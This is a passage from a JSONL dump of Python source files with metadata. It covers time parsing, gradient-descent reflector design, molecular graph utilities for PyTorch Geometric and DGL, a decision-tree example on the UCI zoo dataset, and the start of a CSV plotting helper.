1)\n elif timestamp != TODAY_STR:\n evaluated = False\n \n # - hh:mm[:ss] is TODAY at hh:mm[:ss]\n\n for fmt in abshourfmtlist:\n if not evaluated:\n try:\n mydt = mydt.strptime(timestamp, fmt)\n val = datetime.datetime.utcnow()\n val = val.replace(hour=mydt.hour, minute=mydt.minute, \n second=mydt.second, microsecond=ms)\n evaluated = True\n except:\n pass\n \n if evaluated:\n return val\n\n return None\n\n#*******************************************************************************\n# SPELL Definitions\n#*******************************************************************************\n\nDAY = TIME('+1 00:00:00')\nHOUR = TIME('+01:00:00')\nMINUTE = TIME('+00:01:00')\nSECOND = TIME('+00:00:01')\n\nNOW = TIME(NOW_STR)\nTODAY = TIME(TODAY_STR)\nYESTERDAY = TIME(YESTERDAY_STR)\nTOMORROW = TIME(TOMORROW_STR)\n","sub_path":"spell/spell/utils/ttime.py","file_name":"ttime.py","file_ext":"py","file_size_in_byte":14782,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"258912180","text":"from reflector_problem.point_source import compute_point_source_reflector\nfrom reflector_problem.raytracing.utils import to_angle\nimport torch\n\ndef design_reflector_gd(\n extended_source_target,\n extended_angular_support,\n initial_target,\n initial_angular_support,\n input_measure_vector,\n input_angular_support,\n raytracer,\n loss,\n optimizer,\n history,\n cost_normalization=True,\n n_steps=20,\n lr=1.,\n lr_multiplier=1.):\n history.save_vars(optimization = \"gradient_descent\")\n history.save_vars(raytracer = str(raytracer))\n history.save_vars(loss = str(loss))\n \n modified_target = initial_target.clone()\n modified_angular_support = initial_angular_support.clone()\n\n modified_target_log = modified_target.log(\n ) + modified_target.logsumexp(dim=-1, keepdim=False)\n modified_target_log.requires_grad_(True)\n optim = optimizer([modified_target_log],\n lr=lr)\n scheduler = torch.optim.lr_scheduler.MultiplicativeLR(optim, lr_lambda=lambda step:lr_multiplier)\n\n input_angular_support = input_angular_support.to(input_measure_vector.device)\n modified_target_log = modified_target_log.to(input_angular_support.device)\n modified_angular_support = modified_angular_support.to(input_angular_support.device)\n\n cost_normalizer = 1.\n \n if cost_normalization:\n sinkhorn_result = compute_point_source_reflector(\n input_measure_vector.view(-1).to(input_measure_vector.device),\n input_angular_support.view(-1, 1),\n modified_target_log.softmax(dim=-1).view(-1).to(input_measure_vector.device),\n modified_angular_support.view(-1, 1)\n )\n \n rays, weights = raytracer.raytrace_reflector(sinkhorn_result)\n cost_normalizer = loss(weights, to_angle(rays), extended_source_target, extended_angular_support)\n cost_normalizer = cost_normalizer.detach()\n\n for i in range(n_steps):\n optim.zero_grad()\n sinkhorn_result = compute_point_source_reflector(\n input_measure_vector.view(-1).to(input_measure_vector.device),\n input_angular_support.view(-1, 1),\n modified_target_log.softmax(\n dim=-1).view(-1).to(input_measure_vector.device),\n modified_angular_support.view(-1, 1)\n )\n\n rays, weights = raytracer.raytrace_reflector(sinkhorn_result)\n\n cost = loss(weights, to_angle(rays),\n extended_source_target, extended_angular_support)\n cost = cost / cost_normalizer\n\n cost.backward()\n\n optim.step()\n\n history.save_step(i,\n modified_target=modified_target_log.softmax(dim=1).detach().cpu().clone(),\n modified_angular_support=modified_angular_support.detach().cpu().clone(),\n rays=rays.detach().cpu().clone(),\n weights=weights.detach().cpu().clone(),\n cost=cost.detach().cpu().clone(),\n lr=scheduler.get_lr())\n\n scheduler.step()\n\n\n return modified_target_log.softmax(dim=-1), modified_angular_support, history\n","sub_path":"reflector_problem/methods/gradient_descent.py","file_name":"gradient_descent.py","file_ext":"py","file_size_in_byte":3181,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"95723172","text":"import torch\nimport copy\nimport random\nimport networkx as nx\nimport numpy as np\nfrom torch_geometric.utils import convert\nfrom loader import graph_data_obj_to_nx_simple, nx_to_graph_data_obj_simple\n# from rdkit import Chem\n# from rdkit.Chem import AllChem\n# from loader import mol_to_graph_data_obj_simple, \\\n# graph_data_obj_to_mol_simple\n#\n# from loader import MoleculeDataset\n# import scipy.sparse as sparse\n# from scipy.sparse import linalg\n# import karateclub as kc\n# import torch.nn.functional as F\n# from karateclub.node_embedding.structural import graphwave\n# import sklearn.preprocessing as preprocessing\nfrom rdkit import Chem\nfrom torch_geometric.data import Data\n# from rdkit.Chem import Descriptors\n# from rdkit.Chem import AllChem\n# from rdkit import DataStructs\n# from rdkit.Chem.rdMolDescriptors import GetMorganFingerprintAsBitVect\nimport dgl\n\nallowable_features = {\n 'possible_atomic_num_list' : list(range(1, 119)),\n 'possible_formal_charge_list' : [-5, -4, -3, -2, -1, 0, 1, 2, 3, 4, 5],\n 'possible_chirality_list' : [\n Chem.rdchem.ChiralType.CHI_UNSPECIFIED,\n Chem.rdchem.ChiralType.CHI_TETRAHEDRAL_CW,\n Chem.rdchem.ChiralType.CHI_TETRAHEDRAL_CCW,\n Chem.rdchem.ChiralType.CHI_OTHER\n ],\n 'possible_hybridization_list' : [\n Chem.rdchem.HybridizationType.S,\n Chem.rdchem.HybridizationType.SP, Chem.rdchem.HybridizationType.SP2,\n Chem.rdchem.HybridizationType.SP3, Chem.rdchem.HybridizationType.SP3D,\n Chem.rdchem.HybridizationType.SP3D2, Chem.rdchem.HybridizationType.UNSPECIFIED\n ],\n 'possible_numH_list' : [0, 1, 2, 3, 4, 5, 6, 7, 8],\n 'possible_implicit_valence_list' : [0, 1, 2, 3, 4, 5, 6],\n 'possible_degree_list' : [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10],\n 'possible_bonds' : [\n Chem.rdchem.BondType.SINGLE,\n Chem.rdchem.BondType.DOUBLE,\n Chem.rdchem.BondType.TRIPLE,\n Chem.rdchem.BondType.AROMATIC\n ],\n 'possible_bond_dirs' : [ # only for double bond stereo information\n Chem.rdchem.BondDir.NONE,\n Chem.rdchem.BondDir.ENDUPRIGHT,\n Chem.rdchem.BondDir.ENDDOWNRIGHT\n ]\n}\n\ndef mol_to_graph_data_obj_simple(mol):\n \"\"\"\n Converts rdkit mol object to graph Data object required by the pytorch\n geometric package. NB: Uses simplified atom and bond features, and represent\n as indices\n :param mol: rdkit mol object\n :return: graph data object with the attributes: x, edge_index, edge_attr\n \"\"\"\n # atoms\n num_atom_features = 2 # atom type, chirality tag\n atom_features_list = []\n for atom in mol.GetAtoms():\n atom_feature = [allowable_features['possible_atomic_num_list'].index(\n atom.GetAtomicNum())] + [allowable_features[\n 'possible_chirality_list'].index(atom.GetChiralTag())]\n atom_features_list.append(atom_feature)\n x = torch.tensor(np.array(atom_features_list), dtype=torch.long)\n\n # bonds\n num_bond_features = 2 # bond type, bond direction\n if len(mol.GetBonds()) > 0: # mol has bonds\n edges_list = []\n edge_features_list = []\n for bond in mol.GetBonds():\n i = bond.GetBeginAtomIdx()\n j = bond.GetEndAtomIdx()\n edge_feature = [allowable_features['possible_bonds'].index(\n bond.GetBondType())] + [allowable_features[\n 'possible_bond_dirs'].index(\n bond.GetBondDir())]\n edges_list.append((i, j))\n edge_features_list.append(edge_feature)\n edges_list.append((j, i))\n edge_features_list.append(edge_feature)\n\n # data.edge_index: Graph connectivity in COO format with shape [2, num_edges]\n edge_index = torch.tensor(np.array(edges_list).T, dtype=torch.long)\n\n\n # data.edge_attr: Edge feature matrix with shape [num_edges, num_edge_features]\n edge_attr = torch.tensor(np.array(edge_features_list),\n dtype=torch.long)\n else: # mol has no bonds\n edge_index = torch.empty((2, 0), dtype=torch.long)\n edge_attr = torch.empty((0, num_bond_features), dtype=torch.long)\n\n data = Data(x=x, edge_index=edge_index, edge_attr=edge_attr)\n\n return data\n\ndef mol_to_dgl_data_obj_simple(mol):\n \"\"\"\n Converts rdkit mol object to graph Data object required by the pytorch\n geometric package. NB: Uses simplified atom and bond features, and represent\n as indices\n :param mol: rdkit mol object\n :return: graph data object with the attributes: x, edge_index, edge_attr\n \"\"\"\n # atoms\n num_atom_features = 2 # atom type, chirality tag\n atom_features_list = []\n for atom in mol.GetAtoms():\n atom_feature = [allowable_features['possible_atomic_num_list'].index(\n atom.GetAtomicNum())] + [allowable_features[\n 'possible_chirality_list'].index(atom.GetChiralTag())]\n atom_features_list.append(atom_feature)\n x = torch.tensor(np.array(atom_features_list), dtype=torch.long)\n\n num_atoms = len(mol.GetAtoms())\n if len(mol.GetBonds()) > 0:\n edge_fr_list = list()\n edge_to_list = list()\n for bond in mol.GetBonds():\n i = bond.GetBeginAtomIdx()\n j = bond.GetEndAtomIdx()\n edge_fr_list += [i, j]\n edge_to_list += [j, i]\n edge_fr = torch.tensor(edge_fr_list, dtype=torch.long)\n edge_to = torch.tensor(edge_to_list, dtype=torch.long)\n else:\n edge_fr = torch.empty((0, ), dtype=torch.long)\n edge_to = torch.empty((0, ), dtype=torch.long)\n dglg = dgl.DGLGraph()\n dglg.add_nodes(num_atoms)\n dglg.add_edges(edge_fr, edge_to)\n return dglg\n\n\ndef graph_data_obj_to_mol_simple(data_x, data_edge_index, data_edge_attr):\n \"\"\"\n Convert pytorch geometric data obj to rdkit mol object. NB: Uses simplified\n atom and bond features, and represent as indices.\n :param: data_x:\n :param: data_edge_index:\n :param: data_edge_attr\n :return:\n \"\"\"\n mol = Chem.RWMol()\n\n # atoms\n atom_features = data_x.cpu().numpy()\n num_atoms = atom_features.shape[0]\n for i in range(num_atoms):\n atomic_num_idx, chirality_tag_idx = atom_features[i]\n # print(atomic_num_idx)\n atomic_num = allowable_features['possible_atomic_num_list'][atomic_num_idx - 1]\n chirality_tag = allowable_features['possible_chirality_list'][chirality_tag_idx]\n atom = Chem.Atom(atomic_num)\n atom.SetChiralTag(chirality_tag)\n mol.AddAtom(atom)\n\n # bonds\n edge_index = data_edge_index.cpu().numpy()\n edge_attr = data_edge_attr.cpu().numpy()\n num_bonds = edge_index.shape[1]\n for j in range(0, num_bonds, 2):\n begin_idx = int(edge_index[0, j])\n end_idx = int(edge_index[1, j])\n bond_type_idx, bond_dir_idx = edge_attr[j]\n bond_type = allowable_features['possible_bonds'][bond_type_idx]\n bond_dir = allowable_features['possible_bond_dirs'][bond_dir_idx]\n mol.AddBond(begin_idx, end_idx, bond_type)\n # set bond direction\n new_bond = mol.GetBondBetweenAtoms(begin_idx, end_idx)\n new_bond.SetBondDir(bond_dir)\n\n # Chem.SanitizeMol(mol) # fails for COC1=CC2=C(NC(=N2)[S@@](=O)CC2=NC=C(\n # C)C(OC)=C2C)C=C1, when aromatic bond is possible\n # when we do not have aromatic bonds\n # Chem.SanitizeMol(mol, sanitizeOps=Chem.SanitizeFlags.SANITIZE_KEKULIZE)\n\n return mol\n\ndef gen_bfs_order(edge_index, seed):\n nodes_to_neighs = dict()\n for i in range(edge_index.size(1)):\n a, b = int(edge_index[0, i]), int(edge_index[1, i])\n if a not in nodes_to_neighs:\n nodes_to_neighs[a] = [b]\n else:\n nodes_to_neighs[a].append(b)\n if b not in nodes_to_neighs:\n nodes_to_neighs[b] = [a]\n else:\n nodes_to_neighs[b].append(a)\n ordered_nodes = {seed: 0}\n nodes_to_exi = {seed: 1}\n que = [seed]\n cnt = 0\n l = 0\n while (l < len(que)):\n now = que[l]\n l += 1\n for i in nodes_to_neighs[now]:\n if i in nodes_to_exi:\n continue\n else:\n que.append(i)\n nodes_to_exi[i] = 1\n cnt += 1\n ordered_nodes[i] = cnt\n return ordered_nodes\n\n\ndef graph_data_part_to_nx_simple(edge_index, num_nodes):\n \"\"\"\n Converts graph Data object required by the pytorch geometric package to\n network x data object. NB: Uses simplified atom and bond features,\n and represent as indices. NB: possible issues with recapitulating relative\n stereochemistry since the edges in the nx object are unordered.\n :param data: pytorch geometric Data object\n :return: network x object\n \"\"\"\n G = nx.Graph()\n\n # atoms\n # for i in range(num_nodes):\n G.add_nodes_from([j for j in range(num_nodes)])\n\n\n #\n # atom_features = data.x.cpu().numpy()\n # num_atoms = atom_features.shape[0]\n # for i in range(num_atoms):\n # atomic_num_idx, chirality_tag_idx = atom_features[i]\n # G.add_node(i, atom_num_idx=atomic_num_idx, chirality_tag_idx=chirality_tag_idx)\n # pass\n #\n # # bonds\n # edge_index = data.edge_index.cpu().numpy()\n # edge_attr = data.edge_attr.cpu().numpy()\n num_bonds = edge_index.shape[1]\n for j in range(0, num_bonds, 2):\n begin_idx = int(edge_index[0, j])\n end_idx = int(edge_index[1, j])\n # bond_type_idx, bond_dir_idx = edge_attr[j]\n if not G.has_edge(begin_idx, end_idx):\n G.add_edge(begin_idx, end_idx)\n return nx.to_numpy_matrix(G)\n\n\n # return G\n\ndef graph_data_part_to_nx_simple_no_loop(edge_index, num_nodes):\n \"\"\"\n Converts graph Data object required by the pytorch geometric package to\n network x data object. NB: Uses simplified atom and bond features,\n and represent as indices. NB: possible issues with recapitulating relative\n stereochemistry since the edges in the nx object are unordered.\n :param data: pytorch geometric Data object\n :return: network x object\n \"\"\"\n G = nx.Graph()\n\n # atoms\n # for i in range(num_nodes):\n G.add_nodes_from([j for j in range(num_nodes)])\n\n\n #\n # atom_features = data.x.cpu().numpy()\n # num_atoms = atom_features.shape[0]\n # for i in range(num_atoms):\n # atomic_num_idx, chirality_tag_idx = atom_features[i]\n # G.add_node(i, atom_num_idx=atomic_num_idx, chirality_tag_idx=chirality_tag_idx)\n # pass\n #\n # # bonds\n # edge_index = data.edge_index.cpu().numpy()\n # edge_attr = data.edge_attr.cpu().numpy()\n num_bonds = edge_index.shape[1]\n for j in range(0, num_bonds, 2):\n begin_idx = int(edge_index[0, j])\n end_idx = int(edge_index[1, j])\n # bond_type_idx, bond_dir_idx = edge_attr[j]\n if not G.has_edge(begin_idx, end_idx) and begin_idx != end_idx:\n G.add_edge(begin_idx, end_idx)\n return nx.to_numpy_matrix(G)\n\ndef from_edge_index_to_adj(edge_index, num_nodes):\n A = torch.zeros(num_nodes, num_nodes)\n num_edges = edge_index.shape[1]\n for j in range(num_edges):\n a, b = edge_index[0, j], edge_index[1, j]\n if a != b:\n try:\n A[a, b] = A[b, a] = 1.\n except:\n print(num_edges)\n print(edge_index)\n raise RuntimeError(\"aaa\")\n return A\n\ndef get_subgraph_data(data, node_list):\n n_sample = len(node_list)\n idxnew_to_idx = {i: node_idx for i, node_idx in enumerate(node_list)}\n idx_to_idxnew = {node_idx: i for i, node_idx in enumerate(node_list)}\n x = torch.zeros(n_sample, data.x.size(1), dtype=torch.long)\n for j in range(n_sample):\n x[j, :] = data.x[idxnew_to_idx[j], :]\n edge_idx = []\n edge_attri = []\n for i in range(data.edge_index.size(1)):\n a = int(data.edge_index[0, i])\n b = int(data.edge_index[1, i])\n\n if a in idx_to_idxnew and b in idx_to_idxnew:\n a = idx_to_idxnew[a]\n b = idx_to_idxnew[b]\n edge_idx.append([a, b])\n edge_attri.append(data.edge_attr[i, :].unsqueeze(0))\n # print(len(edge_attri), data.edge_attr.size(), n_sample, edge_attri[0])\n\n # if len(edge_attri) == 0:\n # print(len(edge_idx), n_sample, ratio, data.x.size(0))\n # raise RuntimeError(\"len(edge_Attri) == 0!\")\n edge_idx = np.array(edge_idx).T\n edge_idx = torch.from_numpy(edge_idx).long()\n # edge_attri = torch.FloatTensor(edge_attri)\n if len(edge_attri) == 0:\n edge_attri = torch.empty((0, 2), dtype=torch.long)\n else:\n edge_attri = torch.cat(edge_attri, dim=0)\n return x, edge_idx, edge_attri\n\n\ndef sample_subgraph(data, ratio, seed=None):\n assert ratio > 0 and ratio < 1\n num_atoms = data.x.size(0)\n n_sample = int(ratio * num_atoms)\n if n_sample <= 1:\n n_sample = 2\n if seed == None:\n seed = np.random.choice(np.arange(0, num_atoms), size=1)[0]\n G = graph_data_obj_to_nx_simple(data)\n\n node_to_dis = nx.single_source_shortest_path_length(G, seed)\n node_to_dis = sorted(node_to_dis.items(), key=lambda x: x[1])\n sampled_nodes = [x[0] for x in node_to_dis[:n_sample]]\n n_sample = len(sampled_nodes)\n idx_to_idxnew = {j: i for i, j in enumerate(sampled_nodes)}\n idxnew_to_idx = {i: j for i, j in enumerate(sampled_nodes)}\n x = torch.zeros(n_sample, data.x.size(1), dtype=torch.long)\n for j in range(n_sample):\n x[j, :] = data.x[idxnew_to_idx[j], :]\n edge_idx = []\n edge_attri = []\n for i in range(data.edge_index.size(1)):\n a = int(data.edge_index[0, i])\n b = int(data.edge_index[1, i])\n\n if a in idx_to_idxnew and b in idx_to_idxnew:\n a = idx_to_idxnew[a]\n b = idx_to_idxnew[b]\n edge_idx.append([a, b])\n edge_attri.append(data.edge_attr[i, :].unsqueeze(0))\n # print(len(edge_attri), data.edge_attr.size(), n_sample, edge_attri[0])\n\n if len(edge_attri) == 0:\n print(len(edge_idx), n_sample, ratio, data.x.size(0))\n raise RuntimeError(\"len(edge_Attri) == 0!\")\n edge_idx = np.array(edge_idx).T\n edge_idx = torch.from_numpy(edge_idx).long()\n # edge_attri = torch.FloatTensor(edge_attri)\n edge_attri = torch.cat(edge_attri, dim=0)\n\n # edge_attri = torch.from_numpy(np.array(edge_attri))\n\n return x, edge_idx, edge_attri\n\n\ndef sampled_subgraph_gcc(data, seed=None, step_dist=[1.0, 0.0, 0.0], length=64, rsprob=0.8):\n # assert ratio > 0 and ratio < 1\n num_atoms = data.x.size(0)\n # n_sample = int(ratio * num_atoms)\n if seed == None:\n seed = np.random.choice(np.arange(0, num_atoms), size=1)[0]\n\n # step_dist = [1.0, 0.0, 0.0]\n # print(seed)\n step = np.random.choice(len(step_dist), 1, p=step_dist)[0] + 1\n G = graph_data_obj_to_nx_simple(data)\n dgl_bg = dgl.DGLGraph(G)\n # edges = torch.tensor(dgl_bg.edges(), dtype=torch.long)\n # dgl_bg = dgl.graph((edges[0], edges[1]))\n # print(seed)\n length = 64\n traces, _ = dgl.sampling.random_walk(\n dgl_bg,\n [seed],\n restart_prob=0.0,\n length=step)\n # print(len(traces[0]))\n other_node = int(traces[0][-1].item())\n # traces, _ = dgl.sampling.random_walk(\n # dgl_bg,\n # [seed, other_node],\n # # prob=\"pos_sample_p\",\n # restart_prob=rsprob,\n # length=length * 19)\n # traces = dgl.contrib.sampling.random_walk_with_restart(\n # dgl_bg,\n # seeds=[seed, other_node],\n # restart_prob=rsprob,\n # max_nodes_per_seed=64,\n # )\n\n traces, _ = dgl.sampling.random_walk(\n dgl_bg,\n [seed for __ in range(1)],\n # prob=\"pos_sample_p\",\n restart_prob=0.0,\n length=length)\n # todo: count the frequency and choose top k ones?\n # subv = torch.unique(traces).tolist()\n subv_a = torch.unique(traces).tolist()\n # subv_a = torch.unique(traces[0]).tolist()\n\n traces, _ = dgl.sampling.random_walk(\n dgl_bg,\n [other_node for __ in range(1)],\n # prob=\"pos_sample_p\",\n restart_prob=0.0,\n length=length)\n subv_b = torch.unique(traces).tolist()\n # subv_b = torch.unique(traces[1]).tolist()\n # print(\"calculated...\", subv)\n # try:\n # # subv.remove(seed)\n # subv_a.remove(seed)\n # subv_a.remove(seed)\n # except:\n # pass\n try:\n subv_a.remove(-1)\n subv_b.remove(-1)\n except:\n pass\n if len(subv_a) == 1:\n subv_a.append(other_node)\n if len(subv_b) == 1:\n subv_b.append(seed)\n # print(len(subv_a), len(subv_b), seed, other_node)\n return [subv_a, subv_b]\n\n\ndef sample_subgraph_only_node(data, ratio, seed=None):\n assert ratio > 0 and ratio < 1\n num_atoms = data.x.size(0)\n n_sample = int(ratio * num_atoms)\n if seed == None:\n seed = np.random.choice(np.arange(0, num_atoms), size=1)[0]\n G = graph_data_obj_to_nx_simple(data)\n\n node_to_dis = nx.single_source_shortest_path_length(G, seed)\n node_to_dis = sorted(node_to_dis.items(), key=lambda x: x[1])\n sampled_nodes = [x[0] for x in node_to_dis[:n_sample]]\n # n_sample = len(sampled_nodes)\n return sampled_nodes\n\n\ndef filter_attri(data, k=3, sigma=1):\n G = graph_data_obj_to_nx_simple(data)\n # G.remove_edges_from(G.selfloop_edges())\n adj = nx.to_numpy_matrix(G)\n N = adj.shape[0]\n adj = torch.from_numpy(adj) + (sigma - 1) * torch.eye(N)\n D = adj.sum(dim=1, keepdim=True)\n A_rw = adj / D\n filtered_attri = data.x\n for j in range(k):\n filtered_attri = torch.matmul(A_rw.float(), filtered_attri.float())\n return filtered_attri\n\n\ndef filter_attri_from_batch(x, edge_index, num_nodes, num_edges, filter_k, sigma=1):\n filtered_x = list()\n num_graphs = len(num_nodes)\n cum_nodes = 0\n cum_edges = 0\n for i in range(num_graphs):\n now_graph_nodes = num_nodes[i]\n now_graph_edges = num_edges[i]\n x_now = x[cum_nodes: cum_nodes + now_graph_nodes, :]\n if filter_k[i] == 0:\n filtered_x.append(x_now)\n cum_nodes += now_graph_nodes\n cum_edges += now_graph_edges\n continue\n # print(i, now_graph_nodes, x_now.size(0))\n # print(filter_k)\n edge_index_now = edge_index[:, cum_edges: cum_edges + now_graph_edges] - cum_nodes\n # A = from_edge_index_to_adj(edge_index_now, now_graph_nodes) + sigma * torch.eye(now_graph_nodes)\n A = torch.from_numpy(graph_data_part_to_nx_simple(edge_index_now, now_graph_nodes)) + sigma * torch.eye(now_graph_nodes)\n D = A.sum(dim=1, keepdim=True)\n A_rw = A / D\n A_rw = A_rw.to(x.device).float()\n x_filtered = x_now\n for j in range(filter_k[i]):\n x_filtered = torch.matmul(A_rw, x_filtered)\n filtered_x.append(x_filtered)\n cum_nodes += now_graph_nodes\n cum_edges += now_graph_edges\n\n filtered_x = torch.cat(filtered_x, dim=0)\n assert filtered_x.size() == x.size(), \"must keep the same dimension!\"\n return filtered_x\n\n\ndef from_rep_to_subgraph_rep(batch, x, pool_func=\"sum\"):\n tot_num_sub = batch.num_sub_nodes.size(0)\n subgraph_reps = list()\n cusum_nodes = 0\n for i in range(tot_num_sub):\n now_sub_num_nodes = int(batch.num_sub_nodes[i])\n now_x_range = batch.s_nodes[cusum_nodes: cusum_nodes + now_sub_num_nodes]\n now_x = x[now_x_range, :]\n assert now_x.size(0) == now_sub_num_nodes\n if pool_func == \"sum\":\n now_sub_rep = now_x.sum(dim=0, keepdims=True)\n elif pool_func == \"mean\":\n now_sub_rep = now_x.mean(dim=0, keepdims=True)\n else:\n raise NotImplementedError(\"pool_func should be sum or mean\")\n subgraph_reps.append(now_sub_rep)\n cusum_nodes += now_sub_num_nodes\n assert now_sub_rep.size(0) == 1\n subgraph_reps = torch.cat(subgraph_reps, dim=0)\n assert subgraph_reps.size(0) == tot_num_sub\n return subgraph_reps\n\ndef node_context_extract_with_step(data, seed, step):\n G = graph_data_obj_to_nx_simple(data)\n seed_in_step = nx.single_source_shortest_path_length(G, seed, step)\n context_nodes = list(seed_in_step.keys())\n return context_nodes\n\ndef get_bfs_order(data, seed):\n G = graph_data_obj_to_nx_simple(data)\n node_to_step = nx.single_source_shortest_path_length(G, seed)\n node_step_list = sorted(node_to_step.items(), key=lambda i: i[0])\n node_ordered = [par[0] for par in node_step_list]\n return node_ordered\n\ndef get_adj_dict(data):\n node_to_adj = dict()\n\n num_edges = data.edge_index.size(1)\n for i in range(num_edges):\n a, b = int(data.edge_index[0, i]), int(data.edge_index[1, i])\n if a not in node_to_adj:\n node_to_adj[a] = dict()\n if b not in node_to_adj:\n node_to_adj[b] = dict()\n node_to_adj[a][b] = 1\n node_to_adj[b][a] = 1\n return node_to_adj\n\nimport hashlib\nimport math\n\ndef positional_embedding(node_to_data, dh_2):\n num_nodes = len(node_to_data)\n all_pos_emb = list()\n for node in range(num_nodes):\n color = node_to_data[node]\n wl_emb = [torch.tensor([math.sin(color / math.pow(10000, 2 * i / (dh_2 * 2))),\n math.cos(color / math.pow(10000, (2 * i + 1) / (dh_2 * 2)))]) for i in range(dh_2)]\n wl_emb = torch.cat(wl_emb, dim=0)\n all_pos_emb.append(wl_emb.unsqueeze(0))\n all_pos_emb = torch.cat(all_pos_emb, dim=0)\n return all_pos_emb\n\n\ndef get_wl_position_embedding(data, dh_2, max_iter=2):\n assert dh_2 > 0\n node_to_adj = get_adj_dict(data)\n node_to_color = dict()\n num_nodes = data.x.size(0)\n for i in range(num_nodes):\n node_to_color[i] = 1\n iter_count = 0\n while True:\n node_to_color_new = dict()\n for node in range(num_nodes):\n neis_color_list = [node_to_color[nei] for nei in node_to_adj[node]]\n color_string_list = [str(node_to_color[node])] + sorted([str(color) for color in neis_color_list])\n color_string = \"_\".join(color_string_list)\n hash_obj = hashlib.md5(color_string.encode())\n hashing = hash_obj.hexdigest()\n node_to_color_new[node] = hashing\n color_index_dict = {k: v + 1 for v, k in enumerate(sorted(set(node_to_color_new.values())))}\n for node in range(num_nodes):\n node_to_color_new[node] = color_index_dict[node_to_color_new[node]]\n if node_to_color_new == node_to_color or iter_count == max_iter:\n break\n else:\n node_to_color = node_to_color_new\n iter_count += 1\n all_wl_emb = positional_embedding(node_to_color, dh_2)\n # all_wl_emb = list()\n # for node in range(num_nodes):\n # color = node_to_color[node]\n # wl_emb = [torch.tensor([math.sin(color / math.pow(10000, 2 * i / (dh_2 * 2))),\n # math.cos(color / math.pow(10000, (2 * i + 1) / (dh_2 * 2)))]) for i in range(dh_2)]\n # wl_emb = torch.cat(wl_emb, dim=0)\n # all_wl_emb.append(wl_emb.unsqueeze(0))\n # all_wl_emb = torch.cat(all_wl_emb, dim=0)\n assert all_wl_emb.size(0) == num_nodes\n return all_wl_emb\n\n# todo for intimacy embedding, should use the embedding layer?4\n# todo it seems that calculating the hop distance between two nodes is time consuming... then how can we solve it?\ndef get_node_context(S, k):\n # S --- torch tensor n x n\n num_nodes = S.size(0)\n S[torch.arange(num_nodes), torch.arange(num_nodes)] = 1000000.0\n tok_k_node_idx = torch.argsort(S, descending=True)[:, :k]\n assert tok_k_node_idx[:, 0] == torch.arange(num_nodes)\n\n\n\n # for node in range(num_nodes):\n # adjs = S[node, :]\n # adjs[node] = 1000000\n # top_k_node = torch.argsort(adjs, descending=True)[: k]\n return tok_k_node_idx\n\n#\n\ndef get_intimacy_matrix(data, k, alpha=0.15, approx_mode=\"power\"):\n assert k > 1\n # G = graph_data_obj_to_nx_simple(data)\n # adj = nx.to_numpy_matrix(G)\n # n = adj.shape[0]\n # adj[]\n adj = graph_data_part_to_nx_simple_no_loop(data.edge_index, data.x.size(0))\n adj = torch.from_numpy(adj)\n n = adj.size(0)\n D = adj.sum(dim=1, keepdim=True)\n tilde_adj = adj / torch.clamp(D, min=1e-12)\n inner_mat = torch.eye(n) + (1 - alpha) * tilde_adj\n if approx_mode == \"power\":\n S = alpha * torch.pow(inner_mat, k)\n else:\n raise NotImplementedError(\"approx_mode error\")\n return S\n\ndef get_tree_edges(data):\n tree_edges = list()\n queue = list()\n vis = dict()\n num_atoms = data.x.size(0)\n vis = {i: 0 for i in range(num_atoms)}\n node_to_adjs = dict()\n for i in range(0, data.edge_index.size(1), 2):\n a, b = int(data.edge_index[0, i]), int(data.edge_index[1, i])\n if a not in node_to_adjs:\n node_to_adjs[a] = {}\n if b not in node_to_adjs:\n node_to_adjs[b] = {}\n node_to_adjs[a][b] = i // 2\n node_to_adjs[b][a] = i // 2\n seed = np.random.choice(range(num_atoms), 1)[0]\n queue.append(seed)\n vis[seed] = 1\n l = 0\n\n while l != len(queue):\n now = queue[l]\n for nei in node_to_adjs[now]:\n if vis[nei] == 0:\n vis[nei] = 1\n queue.append(nei)\n tree_edges.append(node_to_adjs[now][nei])\n l += 1\n\n all_edges = range(data.edge_index.size(1) // 2)\n no_tree_edges = set(all_edges) - set(tree_edges)\n return tree_edges, no_tree_edges\n\n","sub_path":"chem/utils2.py","file_name":"utils2.py","file_ext":"py","file_size_in_byte":25442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"597563710","text":"#Import the DecisionTreeClassifier\nfrom sklearn.tree import DecisionTreeClassifier\nimport pandas as pd\n\n\n#Import the dataset \ndataset = pd.read_csv('https://archive.ics.uci.edu/ml/machine-learning-databases/zoo/zoo.data',\n names=['animal_name','hair','feathers','eggs','milk','airbone','aquatic','predator','toothed',\n 'backbone','breathes','venomous','fins','legs','tail','domestic','catsize','class'])\n#Drop the name,not a good feature to split the data on\ndataset=dataset.drop('animal_name',axis=1)\n\n\n#Split the data into a training and a testing set\ntrain_features = dataset.iloc[:80,:-1]\ntest_features = dataset.iloc[80:,:-1]\ntrain_targets = dataset.iloc[:80,-1]\ntest_targets = dataset.iloc[80:,-1]\n\n\n#Train the model\ntree = DecisionTreeClassifier(criterion = 'entropy').fit(train_features,train_targets)\n\n\n#Predict the classes of new, unseen data\nprediction = tree.predict(test_features)\n\n\n#Check the accuracy\nprint(\"Prediction accuracy -> \",tree.score(test_features,test_targets)*100,\"%\")\n\n# output -> Prediction accuracy -> 80.95238095238095 %\n","sub_path":"ClassificationModels/Python/DecisionTreeClassifier/Zoo.py","file_name":"Zoo.py","file_ext":"py","file_size_in_byte":1102,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"541220015","text":"import matplotlib.pyplot as plt\nimport sys\nimport os\nimport csv\n\n\ndef dim(a):\n if not type(a) == list:\n return []\n return [len(a)] + dim(a[0])\n\n\ndef get_data_from_csv(dir_path, order=None, x_data_cols=1, uni_x=False):\n file_list = os.listdir(dir_path)\n file_num = len(file_list)\n # to skip the first row of the table or not\n skip_header = True\n # flag to create the y_data frame\n is_first = True\n # from (x_data_cols + 1), the data should be in y_data\n x_data = [[] for i in range(file_num)]\n\n for i in range(file_num):\n with open(dir_path + '/' + file_list[i]) as f:\n if not order:\n order = range(file_num)\n index = order[i]\n file = csv.reader(f, delimiter='\\t')\n\n # first, read the headers\n if skip_header:\n # skip the line.\n header = file.__next__()\n n_cols = len(header)\n else:\n pass\n\n if (is_first):\n y_data = [[[] for ii in range(n_cols - x_data_cols)] for jj in range(file_num)]\n is_first = False\n # then, read the data\n # typically, if the x_data_cols is 1, then 